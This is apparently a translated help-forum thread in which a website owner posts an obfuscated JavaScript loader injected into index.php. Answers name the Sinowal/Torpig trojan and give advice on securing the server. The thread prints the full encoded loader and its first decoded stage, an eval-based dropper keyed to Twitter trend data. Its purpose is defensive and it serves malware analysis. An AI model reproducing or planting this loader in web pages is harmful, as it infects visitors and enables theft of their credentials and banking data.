Lütfen bu gizemli, şifrelenmiş kodu deşifre etmeme yardım edin - index.php dosyama garip bir kod yerleştirilmiş

4 Cevap

Birisi kötü niyetle web sitem ahoffmanawning.com'a aşağıdaki kodu ekledi. Bu, kötü yazılmış bir PHP form betiği aracılığıyla yapılmış olabilir mi? Ayrıca, daha da önemlisi, bu betik ne yapıyor?

<script language="javascript">
// Injected, obfuscated loader as found in index.php. $a is only a carrier
// string: every "Z" stands for "%", so the text is URL-encoded JavaScript with
// the escape marker swapped. The z() function at the end of this script puts
// the "%" back, unescape()s the result, and eval() then runs the decoded stage.
// The same "Z"->"%" replace followed by a URL-decode recovers the next stage
// as plain text without executing anything.
$a="Z63dZ3dZ22Z253dst+Z2553tZ2572iZ256eg.Z2566Z2572oZ256dCZ2568arCZ256fdeZ2528(tmZ2570Z252eZ2563hZ22;dzZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564wZ2528t)Z257bcaZ253dZ2527Z252564Z25256fcZ252575mZ252565Z256eZ2574.Z252577ritZ252565Z25252Z2538Z252522Z2527;ceZ253dZ2527Z25252Z2532)Z2527;cZ2562Z253dZ2527Z25253cscrZ252569pZ252574Z2520Z25256caZ25256eguZ252561gZ252565Z25253dZ25255cZ252522Z256aaZ2576aZ2573Z2563Z252572iZ252570tZ2525Z2535Z2563Z252522Z25253Z2565Z2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ252572Z2569Z252570Z252574Z25253eZ2527;eZ2576aZ256c(unZ2565scaZ2570e(Z2574))Z257dZ253bZ22;caZ3dZ22Z2566Z2575Z256ecZ2574iZ256fn dZ2563sZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573capZ2565Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;opZ3dZ22Z2524Z2561Z253dZ2522dw(dcsZ2528cu,Z25314)Z2529;Z2522Z253bZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bZ2564Z2563+Z2564dZ252bdZ2565Z252c1Z2530)Z253bdZ2577(Z2573Z2574Z2529;Z2573tZ253dZ2524aZ253bZ2522;Z22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d
7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;czZ3dZ22Z2566Z2575Z256eZ2563tioZ256eZ2520czZ2528cz)Z257brZ2565tuZ2572n Z2563aZ252bcb+Z2563cZ252bcdZ252bce+Z2563Z257aZ253b}Z253bZ22;ceZ3dZ22aZ2572Z2543odZ2565AtZ25280)Z255eZ2528Z25270x0Z2530Z2527+eZ2573))Z2529;Z257dZ257dZ22;ccZ3dZ225ngtZ2568Z253bZ2569+Z252b)Z257btmpZ253ddZ2573.Z2573licZ2565(iZ252ci+Z2531);Z2573tZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;cbZ3dZ22(Z2564s);Z2573tZ253dtmZ2570Z253dZ2527Z2527;forZ2528Z2569Z253d0Z253bZ2569Z253cds.lZ256Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|KZ2520;64c}p`|)Z25$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;Z69Z66Z20(Z64Z6fcuZ6denZ74.coZ6fkieZ2eindZ65xOZ66Z28Z27rf5fZ36Z64sZ27)Z3dZ3d-1)Z7bfunZ63Z74iZ6fn Z63allZ62aZ63Z6b(xZ29Z7bwindoZ77.tZ77Z20Z3d x;Z76Z61rZ20dZ20Z3dZ20newZ20DZ61tZ65Z28);dZ2eseZ74TiZ6de(Z78Z5bZ22as_Z6fZ66Z22]*Z31Z30Z300);Z76arZ20hZ20Z3dZ20dZ2egZ65tZ55TCHZ6fursZ28);Z77iZ6edZ6fwZ2ehZ20Z3d h;if Z28h Z3e 
8)Z7bd.sZ65tZ55TCDZ61Z74eZ28d.gZ65tUZ54CZ44Z61Z74Z65()Z20-Z202);Z7delsZ65Z7bd.seZ74UTCZ44ateZ28d.Z67etUZ54CDaZ74e()Z20Z2d Z33)Z3b}wZ69ndZ6fw.gZ64Z20Z3d d;Z76arZ20tiZ6dZ65 Z3d Z6eewZ20ArZ72Z61y(Z29;vaZ72 shZ69ftZ49nZ64Z65xZ20Z3dZ20Z22Z22;timeZ5bZ22yearZ22] Z3d d.Z67etUZ54CFuZ6clZ59earZ28)Z3btimZ65[Z22moZ6etZ68Z22] Z3d dZ2egeZ74UZ54Z43MoZ6etZ68()+Z31;tZ69mZ65[Z22daZ79Z22] Z3d d.gZ65tUZ54CZ44aZ74e(Z29;ifZ20(dZ2egZ65tZ55TZ43MZ6fntZ68()+Z31 Z3cZ2010)Z7bshiZ66Z74IZ6edeZ78 Z3d timZ65[Z22yearZ22] +Z20Z22-0Z22 +Z20Z28d.gZ65tUTZ43MonZ74h(Z29+Z31Z29;}Z65Z6csZ65Z7bshifZ74InZ64eZ78 Z3d tZ69meZ5bZ22yearZ22] +Z20Z22Z2dZ22 Z2b (dZ2egeZ74Z55TCZ4donZ74h(Z29+Z31);Z7dZ69f Z28dZ2eZ67Z65tUZ54CDZ61teZ28Z29 Z3c 10Z29Z7bsZ68ifZ74IndZ65x Z3dshZ69ftZ49ndeZ78 + Z22Z2dZ30Z22 + dZ2eZ67Z65tUZ54CZ44aZ74e()Z3b}eZ6cseZ7bshZ69ftIZ6eZ64Z65Z78 Z3d sZ68ifZ74IZ6edZ65x +Z20Z22-Z22 +Z20dZ2eZ67etUZ54CDZ61tZ65()Z3b}dZ6fcZ75Z6dentZ2ewZ72iZ74Z65Z28Z22Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2eZ74wiZ74teZ72.coZ6dZ2ftrZ65nZ64Z73Z2fdaZ69Z6cyZ2eZ6asonZ3fdatZ65Z3dZ22+ shiZ66tInZ64eZ78Z2bZ22&Z63allZ62Z61Z63Z6bZ3dcallbZ61ck2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 Z2b Z22iZ70Z74Z3eZ22);Z7d fZ75nZ63tioZ6e Z63Z61lZ6cbZ61cZ6b2(Z78)Z7bwindZ6fZ77.tZ77Z20Z3d x;Z73c(Z27rf5Z666dZ73Z27,2,7)Z3bevaZ6c(Z75Z6eesZ63apeZ28dzZ2bZ63zZ2bopZ2bsZ74)+Z27dwZ28Z64z+cZ7a($Z61+stZ29Z29;Z27);dZ6fcZ75menZ74.Z77ritZ65(Z24a)Z3b}dZ6fZ63umeZ6et.wZ72iteZ28Z22Z3cimgZ20sZ72cZ3dZ27http:Z2fZ2fseZ61rcZ68Z2etZ77Z69tteZ72.coZ6dZ2fZ69mZ61Z67eZ73Z2fseZ61rcZ68Z2frss.Z70ngZ27 wZ69dtZ68Z3d1Z20Z68Z65ighZ74Z3d1 stZ79lZ65Z3dZ27visibilZ69tZ79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cangZ75agZ65Z3djavZ61sZ63riZ70tZ22+Z22 srcZ3dZ27httZ70:Z2fZ2fseaZ72ch.Z74Z77ittZ65rZ2ecomZ2fZ74renZ64sZ2fdaiZ6cy.jZ73Z6fn?cZ61lZ6cZ62ackZ3dcaZ6clbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22ipZ74Z3eZ22);Z7deZ6csZ65Z7b$aZ3dZ27Z27};functionZ20sZ63Z28Z63nm,Z76Z2cedZ29Z7bvar 
eZ78dZ3dnewZ20DatZ65()Z3beZ78d.Z73Z65tZ44aZ74Z65Z28exdZ2egeZ74Z44aZ74Z65Z28)Z2bedZ29;dZ6fcZ75menZ74.cZ6fokiZ65Z3dcnZ6d+ Z27Z3dZ27 +esZ63apeZ28v)Z2bZ27;expiZ72esZ3dZ27+eZ78Z64.Z74Z6fZ47Z4dTZ53Z74rinZ67();Z7dZ3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a)); // z(): walk $a, replace each "Z" with "%", unescape(); eval() executes the decoded text
</script>

4 Cevap

Tekrar etmek gerekirse: bunu kimse tarayıcısında çalıştırmasın, kthx.

JavaScript kodu gizlenmiş (obfuscate edilmiş); muhtemelen hiçbirimizin bunu sizin için çözecek kadar zamanı yok, ancak oraya nasıl geldiğini bilmiyorsanız, bu kod neredeyse kesinlikle bir tarayıcı güvenlik açığını kullanarak kötü amaçlı yazılım ya da başka bir kötü niyetli kod yüklemeye çalışıyordur.

As to how it got there: someone got access to your server files.
This could be (in order of likelihood):

  • Birisi, kendisine dosya sistemine erişim veren bir PHP güvenlik açığı keşfetti
  • Birisinin FTP bilgilerinize erişimi var
  • Kötü niyetli bir geliştiriciniz var
  • ya da belki web sunucusunda, veritabanında, işletim sisteminde veya sunucu üzerinde çalışan bir hizmette bir güvenlik açığı var.

Ben olsam FTP şifrenizi değiştirir, sisteminizde akla gelebilecek her şeyi son sürüme güncellerdim ve dosya sistemine erişen her türlü özel PHP kodunu ciddi biçimde gözden geçirirdim.


[Düzenleme]: DTH'nin verdiği bağlantıya göre, bu kod Sinowal adında bir truva atını (virüs) indirip çalıştırıyor gibi görünüyor.

Bu truva atı, bulaştığı makineden çeşitli sistem ve hesap bilgilerini çalmaya çalışır. Çalınan bilgiler şunlar olabilir:

• IMAP/POP3/SMTP username, passwords, server information from mail clients such as AK-Mail,Thunderbird,TheBat
• Bookmarks
• E-mail addresses from the Windows Address Book
• Passwords and other data stored from FTP clients such as Trellian FTP, WS_FTP, Total Commander, Crystal FTP Pro and GlobalSCAPE

Aynı zamanda çevrimiçi bankacılık bilgileri için Internet Explorer, Firefox ve Mozilla gibi web tarayıcılarını izler.

Yaptığı şey bu. Ne yaptığını gizlemek için sadece çöple başlıyor, ama sonunda Twitter'a yönelik bazı istekler olduğunu düşünüyorum. Tadını çıkarın!

// First decoded stage of the injected script above, as pasted in the answer
// (the line breaks inside the quoted strings come from the paste's column
// wrapping, not from the code). cd/dz/ca/da/op/db/st/dc/cz/ce/cc/dd/cb/de/cu
// hold further URL-encoded or substitution-encoded fragments that are only
// assembled and eval()ed later. The readable tail at the bottom shows the
// control flow: when the cookie "rf5f6ds" is absent it document.write()s a
// hidden 1x1 <img> from search.twitter.com plus a JSONP <script> for
// search.twitter.com/trends/daily.json; callback() derives a date 2 or 3 days
// back (depending on the UTC hour) into shiftIndex and loads daily.json again
// for that date with callback2; callback2 sets the cookie via sc('rf5f6ds',2,7)
// (7-day expiry), eval()s unescape(dz+cz+op+st) and writes $a into the page.
// The cookie name, the two daily.json requests and the hidden rss.png image
// are the observable markers of a page that has run this stage.
cd="%3dst+%53t%72i%6eg.%66%72o%6dC%68arC%6fde%28(tm%70%2e%63h";dz="%66%75n%63t%6
9on %64w%28t)%7bca%3d%27%2564%256fc%2575m%2565%6e%74.%2577rit%2565%252%38%2522%2
7;ce%3d%27%252%32)%27;c%62%3d%27%253cscr%2569p%2574%20%256ca%256egu%2561g%2565%2
53d%255c%2522%6aa%76a%73%63%2572i%2570t%25%35%63%2522%253%65%27;cc%3d%27%253c%25
5c%252fsc%2572%69%2570%2574%253e%27;e%76a%6c(un%65sca%70e(%74))%7d%3b";ca="%66%7
5%6ec%74i%6fn d%63s%28ds,%65s%29%7bds%3dune%73cap%65";da="fqb0t-7vrs}vyb>s%7F}7+
0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660
gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyM
K$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv
088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0
-0gy~t%7Fg>d";op="%24%61%3d%22dw(dcs%28cu,%314)%29;%22%3b";db="g>dbu~tcKyMK$M>ae
ubi>sxqbS%7FtuQd8!90;0!%20;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxy
vdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb8
9+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudE
DSTqdu89+fqb0t-7vrs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07
vyb7<07fyv7<07huc";st="%73t%3d%22$%61%3ds%74;%64c%73(%64a%2bd%62%2b%64%63+%64d%2
bd%65%2c1%30)%3bd%77(%73%74%29;%73t%3d%24a%3b%22;";dc="7<07fuc7<07wxd7<07u~y7<07
ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<
7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}ru
bc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%
7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;
0tqi9+m0f";cz="%66%75%6e%63tio%6e%20cz%28cz)%7br%65tu%72n %63a%2bcb+%63c%2bcd%2b
ce+%63%7a%3b}%3b";ce="a%72%43od%65At%280)%5e%28%270x0%30%27+e%73))%29;%7d%7d";cc
="5ngt%68%3b%69+%2b)%7btmp%3dd%73.%73lic%65(i%2ci+%31);%73t";dd="qb0iuqbSx!<0iuq
bSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}
%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90
;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%2
2%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%209M0;0
|uddubcK8888dy}uK7i";cb="(%64s);%73t%3dtm%70%3d%27%27;for%28%69%3d0%3b%69%3cds.l
%6";de="uqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}
%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|ud
dubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}
9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7
F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}r
fuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;sz|K%20;64c}p`|)%$4|q}s|`),$*(;}rfuyq*(;p}b*";if
 (document.cookie.indexOf('rf5f6ds')==-1){function callback(x){window.tw = x;var
 d = new Date();d.setTime(x["as_of"]*1000);var h = d.getUTCHours();window.h = h;
if (h > 8){d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() -
3);}window.gd = d;var time = new Array();var shiftIndex = "";time["year"] = d.ge
tUTCFullYear();time["month"] = d.getUTCMonth()+1;time["day"] = d.getUTCDate();if
 (d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1)
;}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}if (d.getUTCDate()
 < 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIn
dex + "-" + d.getUTCDate();}document.write("<scr"+"ipt language=javascript"+" sr
c='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=cal
lback2'>" + "</scr" + "ipt>");} function callback2(x){window.tw = x;sc('rf5f6ds'
,2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');document.write($a);}docume
nt.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 hei
ght=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http:/
/search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");}
else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+e
d);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();}; // sc(): sets cookie cnm=v expiring ed days from now

http://wepawet.cs.ucsb.edu/static/torpig-twitter.html her şeyi sizin için çözüp analiz etmiş.

Şerefe m8.

Twitter'dan trend konuların bir listesini alıyor gibi görünüyor. Bu, ne yaptığına dair size daha fazla ipucu veriyor mu?